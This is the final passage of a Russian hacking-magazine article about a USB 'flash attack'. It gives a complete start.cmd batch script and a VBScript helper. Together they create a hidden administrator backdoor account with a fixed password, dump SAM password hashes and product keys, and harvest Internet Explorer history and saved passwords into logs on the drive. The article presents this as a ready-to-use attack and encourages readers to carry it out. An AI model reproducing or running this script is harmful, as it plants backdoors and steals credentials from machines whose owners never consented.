флеш-нападение

ЮРИЙ НАУМОВ AKA СКРИПТ

Спецвыпуск: Хакер, номер #072, стр. 072-048-2

[I'll be back...]

Вот мы и рассмотрели так называемую «модель взлома». Полную версию ты сможешь увидеть в видеоуроке на диске ;). Более того, при подробном рассмотрении оказалось, что все это без проблем можно реализовать, совсем не прибегая к технологии U3! Свобода творчества - это главное для хакера. Удачи!

Пример файла start.cmd

@echo off

@if not exist \logfiles md \logfiles >nul

;создаем папку для лог-файлов

@echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \logfiles\%computername%_load.log 2>&1

@ipconfig /all >> \logfiles\%computername%_load.log 2>&1

;производим запись данных о компьютере и сети в лог-файл

@net user /add xakep qw123as /fullname:"I am real cool mega hcaker!" >> \logfiles\%computername%_load.log 2>&1

@net localgroup Administrators xakep /add >> \logfiles\%computername%_load.log 2>&1

@echo MYUSER: xakep Password: qw123as >> \logfiles\%computername%_load.log 2>&1

@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v

xakep /t reg_dword /d 0 /f >> \logfiles\%computername%_load.log 2>&1

;создаем черный ход в системе. Учетная запись "xakep" с паролем "qw123as"

@.\pwdump 127.0.0.1 >> \logfiles\%computername%_load.log 2>&1

;делаем дамп sam-файла паролей

@.\produkey /nosavereg /stext "\logfiles\%computername%_zzz.txt" /remote %computername% >> \logfiles\%computername%_load.log 2>&1

@copy \logfiles\%computername%* \logfiles\%computername%_load.log >> nul

@del /f /q "\logfiles\%computername%_zzz.txt"

;делаем дамп ключей продуктов в системе

@cscript //nologo .\ie.vbs >> \logfiles\%computername%_load.log 2>&1

;делаем дамп истории посещений страниц в Internet Explorer

@.\pspv.exe /stext "\logfiles\%computername%_LSA.log" >> \logfiles\%computername%_load.log 2>&1

@copy \logfiles\%computername%* \logfiles\%computername%_load.log >> nul

@del /f /q "\logfiles\%computername%_LSA.log"

;пытаемся достать пароли, оставленные в IE

:End

@exit

Пример файла ie.vbs

on error resume next

set sh = createobject("Shell.Application")

const ssfHISTORY = 34

set history = sh.NameSpace(ssfHISTORY)

for each item in history.items

wscript.echo history.GetDetailsOf(item,-1)

if item.isFolder then

set itFol = item.GetFolder

for each item2 in itFol.items

wscript.echo vbtab & itFol.GetDetailsOf(item2,-1)

Next

wscript.echo String (80,"-")

end if

next

WWW

FOOFUS.NET/FIZZGIG/PWDUMP/ - PWDUMP

ANTSIGHT.COM/ZSL/RAINBOWCRACK/ - RAINBOW CRACK

HACK5.ORG - ХАКЕРСКИЙ ВИДЕО-МАГАЗИН

«МЫ НАХОДИМСЯ НА ПОРОГЕ НОВОЙ ВОЛНЫ «ИНТЕЛЛЕКТУАЛЬНЫХ НАКОПИТЕЛЕЙ», НА КОТОРЫХ МОЖНО БУДЕТ ХРАНИТЬ ДАННЫЕ И ВСЕ СВОЕ РАБОЧЕЕ ПРОСТРАНСТВО, ВКЛЮЧАЯ ПАРОЛИ И ПАРАМЕТРЫ НАСТРОЙКИ, И ПОДКЛЮЧАТЬ К ЛЮБОМУ КОМПЬЮТЕРУ, НЕ ТАСКАЯ С СОБОЙ ЛАПТОП», - ЗАЯВЛЯЮТ РАЗРАБОТЧИКИ U3

ЗАМЕЧУ, ЧТО НЕКОТОРЫЕ ТУЛЗЫ И СКРИПТЫ, ИСПОЛЬЗУЕМЫЕ ДЛЯ ПОЛУЧЕНИЯ ИНФОРМАЦИИ, МОГУТ ЗАСЕКАТЬСЯ АНТИВИРУСАМИ КАК ЗЛОВРЕДНОЕ ПО